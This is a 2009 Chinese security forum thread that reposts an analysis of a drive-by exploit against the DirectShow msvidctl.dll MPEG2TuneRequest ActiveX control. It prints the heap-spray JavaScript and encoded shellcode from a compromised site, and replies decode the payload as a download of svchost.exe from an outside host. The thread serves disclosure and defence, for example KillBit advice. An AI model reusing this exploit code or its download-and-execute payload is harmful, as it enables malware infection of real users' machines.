查看: 5299|回复: 10
收起左侧

[转载] BDATuner.MPEG2TuneRequest新漏洞(?)

[复制链接]
qianwenxiang
发表于 2009-7-4 22:47:46 | 显示全部楼层 |阅读模式
发现日期:2009-7-4
被挂马网站: 8oy4t.8866.org
挂马页: hxxp://8oy4t.8866.org/aa/go.jpg
漏洞名:  BDATuner.MPEG2TuneRequest Stack Overflow Exploit
CLSID: 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF
软件: Microsoft DirectShow(msvidctl.dll)
版本: Possible all avaliable versions
from: http://safelab.spaces.live.com
ShellCode如下(有缩略):

var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+'%u5858%u5858%u10EB%u4B5B.....%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%uADB7%u3D45%u126B%u4627%uA8EE%uD5DB%uc9c9%u87cd%u9292%ud4d0%ud1d1%ud6d1%ude93%ud0d2%uca92%u92d0%ucbce%ud5de%uced2%u93c9%uc5d8%ubdd8%ubdBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uEAEA'); // xor:0BD
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)  //生成大量数据
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif'; //一个非GIF文件
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

得知试图访问hxxp://milllk.com/wm/svchost.exe,请为此对象设置KillBit防范漏洞。

评分

参与人数 1人气 +1 收起 理由
knifed + 1 强! 学习...

查看全部评分

IllusionWing
发表于 2009-7-5 00:08:37 | 显示全部楼层
无标题.jpg
dayang1717
发表于 2009-7-5 01:20:51 | 显示全部楼层
%uc9c9%u87cd%u9292%ud4d0%ud1d1%ud6d1%ude93%ud0d2%uca92%u92d0%ucbce%ud5de%uced2%u93c9%uc5d8%ubdd8%ubdBD
xor:0BD解为
ttp://milllk.com/wm/svchost.exe
promised
发表于 2009-7-5 14:14:09 | 显示全部楼层
貌似是的
promised
发表于 2009-7-5 14:54:07 | 显示全部楼层
IE7可屏蔽

未命名.JPG

[ 本帖最后由 promised 于 2009-7-7 19:39 编辑 ]
雨宫优子
发表于 2009-7-5 14:55:29 | 显示全部楼层
收藏....
等我找到国外免费空间就放上去
dl123100
发表于 2009-7-5 14:57:53 | 显示全部楼层
根据CLSID好像是新的
taoyuan237
发表于 2009-7-5 15:57:52 | 显示全部楼层
mouse_0232
发表于 2009-7-5 19:47:28 | 显示全部楼层
  最新漏洞  今天好多网站被挂这个漏洞了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-17 07:45 , Processed in 0.132571 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表